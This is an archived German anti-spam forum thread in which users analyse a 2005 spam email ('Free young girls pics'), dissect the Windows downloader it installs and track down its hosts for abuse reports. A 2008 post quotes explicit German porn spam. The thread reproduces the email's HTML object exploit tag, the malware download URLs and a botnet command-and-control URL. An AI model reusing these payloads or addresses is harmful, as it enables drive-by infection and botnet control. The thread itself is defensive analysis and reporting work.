PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [Update][Exploit/Trojaner] Free young girls pics



Sirius
11.03.2005, 09:47
Hallo.
Das ist gestern reingekommen.
----
Date: Thu, 10 Mar 2005 xx:xx:xx +0000
Return-path: <gtqcna [at] yahoo.com>
Received: from [81.182.0.207] by web13337.mail.yahoo.com via HTTP; Thu, 10
Mar 2005 xx:xx:xx -0600
From: Serena Salinas <gtqcna [at] yahoo.com>
To: ###@###
cc:
Message-ID: [ID filtered]
In-Reply-To:
References:
Subject: Free young girls pics
X-Priority: 3
X-CHAOS-Read: yes
X-CHAOS-Size: 2393
Content-Type: multipart/alternative; boundary=
"0-8439802256-4554162116=:67051"
Content-Transfer-Encoding: binary
--0-8439802256-4554162116=:67051
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
<object data="http://www.nzawgjtm. info/sol/page.php"></object>
[...]
Wednesday is my regular day off and having slept in I had just showered and was getting ready to head to the golf course when Val rang. We hadn`t talked much since the other Saturday night, I was still a bit ticked off at her not telling me the whole deal. It seemed Tracey had called her and asked if I could come to her office ASAP. Val asked me to dress in my navy blue suite and be ready for her to arrive. The BMW stopped outside and I climbed into the passenger seat and headed off to the city.<br>http://R51l7Ir7Vr1YeD8.cjb.net/ (<a href=)">Cl1ck h3re to read more</a>
---
ACHTUNG: Der erste Link ist so heiß, dass ich ihn entschärfen musste. Er kommt einmal als Exploit <object... und dann als normaler Link vor (von mir entfernt).
Das Ziel ist "kugelsicher" in China gehostet. Dahinter verbirgt sich ein VB-Script (page.hta), das mittels des Internet Explorers einen sog. "W32/Downloader" (ut.exe) auf dem PC installiert: http://www.nzawgjtm. info/sol/ut.exe
Ich habe die Datei mal heruntergeladen, zerlegt und analysiert:
Die ut.exe ist per UPX gepackt und zerlegt sich selbst in vier teilweise mit UPX gepackte Dateien.
1. Eine davon kümmert sich intensiv um Firewall und Antivirenprogramme. Per DeleteService()-Systemaufruf wird versucht eine lange Liste bekannter Dienste abzuschalten.
2. Eine andere zeichnet möglicherweise Tastatureingaben auf, die weitergeleitet werden.
3. Eine weitere möchte zuerst einen Trojaner laden: http://www.domain-name.biz/downloads/doublespy.exe und nimmt dann Verbindung mit einem Bot-Netz? auf: http://www.porksiop.info/pHy5D89r/command.php?IP=%s&Port1=%u&ID=%s (http://www.porksiop.info/pHy5D89r/command.php)
Vom Bot-Netz aus kann die Kontrolle über den PC übernommen werden, um ihn z.B. als Spam-Relay oder für DDoS-Angriffe zu nutzen.
Den Trojaner gibt es allerdings nicht (in Frankreich gehostet), aber das Bot-Netz ist erreichbar:
http://www.porksiop.info ist in Moskau registriert - unter demselben Namen wie der heiße Link: Elena Dmitrievna. Kennt jemand die Dame?
65.75.189.182 ist in Griechenland gehostet. Die whois-Daten geben nicht viel her, aber es sollte doch innerhalb der EU möglich sein, die Kiste trocken zu legen.
Der CJB-Link ist vermutlich nur zur Ablenkung - die Adresse ist noch zu haben.
Grüße
BTW: So feines Futter bekommt mein Linux nicht alle Tage http://img.homepagemodules.de/smile2.gif

Goofy
11.03.2005, 13:33
Upstream Provider ist
OrgName: Managed Solutions Group, Inc.
Address: 46750 Fremont Blvd.
Address: #107
City: Fremont
StateProv: CA
PostalCode: 94538
Country: US

AbuseEmail: abuse[ätt]managedsg-inc.com
Goofy

Sirius
11.03.2005, 17:16
Mail an abuse[ätt]managedsg-inc.com ist raus.

Sirius
12.03.2005, 11:53
Hallo!
Die Seite http://www.porksiop.info ist nach meinem Abuse-Mail sofort abgeklemmet worden.http://img.homepagemodules.de/smile.gif

Sirius
15.03.2005, 14:59
Achtung.
Die Russenmafia hat wieder zugeschlagen und http://www.porksiop.info in Brasilien reaktiviert. Registriert ist die Domain diesmal auf einen Viktor Slimer.
Ich werde mich mal bei lacnic.net beschweren obwohl ich vermute, dass es hier nicht viel bringt.
Grüße

Sirius
17.03.2005, 17:18
Hallo.
http://www.porksiop.info ist wieder vom Netz http://img.homepagemodules.de/smile.gif
Der Server 200.155.191.39 ist gleich mit platt. Ist aber nicht schade drum, siehe Krankenakte: http://www.spamhaus.org/sbl/sbl.lasso?query=SBL23975
Der DNS-Eintrag existiert allerdings noch.
Ich bin gespannt wo porksiop.info das nächste Mal auftaucht - das scheinen regelrechte Domain-Nomaden zu sein. Längere Unterbrechungen können die sich nicht leisten, wenn sie ihr Bot-Netz "vermarkten" wollen.
http://www.heise.de/newsticker/meldung/51689
Grüße

Sirius
18.03.2005, 07:08
Die Domain ist wieder da.http://img.homepagemodules.de/frown.gif
Diesmal auf 200.155.191.27 beim gleichen Provider gehostet.
Unter http://tinyurl.com/4zmjs habe ich eine Beschreibung des Zwillingsbruders des Trojaners mit Namen Blahot Worm gefunden, der nach demselben Muster funktioniert.
BTW: Sind "Blahot" und "Porksiop" Begriffe aus dem russischen?
Unter http://www.porksiop.info bekommt man neuerdings einen kyrillischen Text zu lesen, was auf russisch heißt: "ich habe deine Mutter ..." - siehe hier: http://www.russki-mat.net/d/E.htm
Grüße

Sirius
31.03.2005, 09:25
Hallo,
nachdem seit einigen Tagen der gesamte IP-Bereich 200.155.191.27/32 tot ist, sind meine Freunde nach China umgezogen.
porksiop.info ist jetzt bei CHINATELECOM unter 219.148.3.140 gehostet. Die IP untersteht den russischen Spammern Pavka/Artofit. Hier endet wohl die Reise :-(
Dafür hat jemand http://www.nzawgjtm.info abgeklemmt ;-)
Grüße

Goofy
31.03.2005, 12:55
Hmmm...
bei mir geht NZAWGJTM.INFO noch bzw. wieder.
202.99.172.181 [CNCGROUP Hebei province network]
NS-record: ns4.mail18.biz -> ist mir als ns-Domain der Mailtrain-Bande bekannt. Domain allerdings dank FTC bereits ohne dns-records.
Also muss man die 202.99.172.181 wohl auch zum IP-Pool der Mailtrain-Bande zählen, bei Spamhaus ist sie schon gelistet, wenn auch ohne Bezug zu Mailtrain.
Goofy

Sirius
31.03.2005, 13:19
bei mir geht NZAWGJTM.INFO
Stimmt - bei mir geht es auch wieder. Allerdings fehlt bislang die /sol/ut.exe
Die scheinen verzweifelt bemüht zu sein, die Kiste wieder zum Laufen zu bringen.

Sirius
24.04.2005, 19:49
Eben mal wieder nach dem Patienten gesehen: http://www.porksiop.info/ ist tot. http://img.homepagemodules.de/death.gif
Da kommt nur diese Meldung:
This is the placeholder for domain porksiop.info. If you see this page after uploading site content you probably have not replaced the index.html file.
Die Whois-Daten sind noch die alten.
Fangen jetzt die Chinesen an, ihre "Porky-Pig"-Schweineställe auszumisten???
[Nachtrag] Zu früh gefreut :-( Die haben wohl nur kurz gelüftet...

Werbehasser
29.04.2008, 14:12
Return-Path: <www-data [at] mail.search-of.com>
Delivery-Date: Tue, 29 Apr 2008 xx:xx:xx +0200
Received: from mail.search-of.com (hs6.nlserver.net [91.184.50.196])
by mx.kundenserver.de (node=mxeu2) with ESMTP (Nemesis)
ID: [ID filtered]
Received: by mail.search-of.com (Postfix, from userID: [ID filtered]
ID: [ID filtered]
To: poor [at] spamvictim.tld
Subject: Hi
From:Kartrin<Katrin82 [at] alles-live.com>
Reply-To:Kartrin<Katrin82 [at] alles-live.com>
Sender:Kartrin<Katrin82 [at] alles-live.com>
Content-Type: text/html
Message-ID: [ID filtered]
Date: Tue, 29 Apr 2008 xx:xx:xx +0200 (CEST)
X-Nemesis-Spam: philter
X-PhishingScore: 1
tests= *alles-live.com
Envelope-To: poor [at] spamvictim.tld



Hi,

diese angebote bekommst Du nur einmal dann nie wieder!!!!!!

Popos-x
Popo S-x ist ein Thema das jeden Mann fasziniert. Aber kaum einer kommt zum Zuge, denn meist macht die Freundin oder Frau einfach nicht mit. Anders sind die Ladies dieser Seite. Sie mögen es einfach im Popo! Egal ob Popo S-x in vielen Stellungen oder doppelte Penetrationen, die Hauptsache sie haben einen Sch-wanz im po sitzen. Selbst doppelte Sch-wänze Penetrationen und Po zum Mund Szenen werden euch hier gezeigt.

Gleich mal vorbei schauen ...... weiter .......

Ora-lse-x
Das ist unglaublich. Dauerheisse Sch-lampen leben Ihre Sexsucht direkt bei uns vor der Kamera aus. Lass dir diese heisse Show nicht entgehen. Über den deutschen Chat hast du jederzeit die Kontrolle über das Geschehen. Als Bonus erhältst du Zugang zum Mega-Movie-Archiv. Hier kannst du die härtesten Por-nos in voller Länge und in DVD-Qualität genießen.

Neugierig geworden??? dann hier weiter ...

Junge Frauen
Gerade 18 Jahre alt und dann schon so hemmungslos durchgef-ickt. Kaum ist die Volljährigkeit erreicht kann gepoppt werden bis zum Exzess. Die jungen Biester stehen aufs Fi-cken und lassen dich in Form von Videos und Bildern an Ihrem Se-xualleben teilhaben. Du kannst sogar live vor der Cam sehen, was die Girls machen. Sie erfüllen dir sicher auch deinen Wunsch.

Jetzt die möglichkeit nutzen ..... weiter .......




Imprint /Impressum

Novonet B.V.
Scheeps Timmermanslaan 5a
3016 AC Rotterdam
The Netherlands

Alg. Directeur: E. Z.
KvK Rotterdam Nr.: 24368306
BTW: NL814113400B01

Contact:
Fax: 0031 (0) 108 920 965
support [at] novonet-bv.com


Cash4members ist ein Projekt der:
Novonet B.V.
Scheeps Timmermanslaan 5a
3016 AC Rotterdam
The Netherlands

Alg. Directeur: E. Z.
KvK Rotterdam Nr.: 24368306
BTW: NL814113400B01

Contact:
Mo - Fr 10:30 - 19:00 Uhr
Tel. +49 (0) 1805 509 110

Fax: +31 (0) 10 892 285 7
support [at] cash4members.com


http://alles-live.com